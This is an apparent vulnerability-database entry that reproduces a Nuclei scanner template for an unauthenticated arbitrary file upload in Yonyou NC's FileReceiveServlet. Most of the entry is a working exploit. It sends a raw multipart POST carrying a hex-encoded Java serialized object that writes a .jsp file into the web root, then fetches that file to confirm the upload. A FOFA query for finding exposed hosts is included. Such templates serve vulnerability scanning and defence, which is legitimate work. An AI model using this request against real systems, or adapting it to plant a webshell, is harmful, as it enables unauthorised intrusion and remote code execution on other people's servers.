yonyou-filereceiveservlet-fileupload: Yonyou NC FileReceiveServlet - Aribitrary File Upload

日期: 2025-08-01 | 影响软件: Yonyou NC FileReceiveServlet | POC: 已公开

漏洞描述

An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.

PoC代码[已公开]

id: yonyou-filereceiveservlet-fileupload

info:
  name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
  author: bjxsec
  severity: critical
  description: |
    An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="用友-UFIDA-NC"
  tags: yonyou,file-upload,intrusive
variables:
  file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
  file_content: "{{randstr}}"

http:
  - raw:
      - |
        POST /servlet/FileReceiveServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;

        {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
      - |
        GET /{{file_name}} HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{file_content}}')"
        condition: and
# digest: 490a00463044022072982f5e82c597f137d283979344365db9763e293d5f4429182c307e859956460220636267780d17d89b04a756c42ad78669ce87a194a08050e798505870e3c70661:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml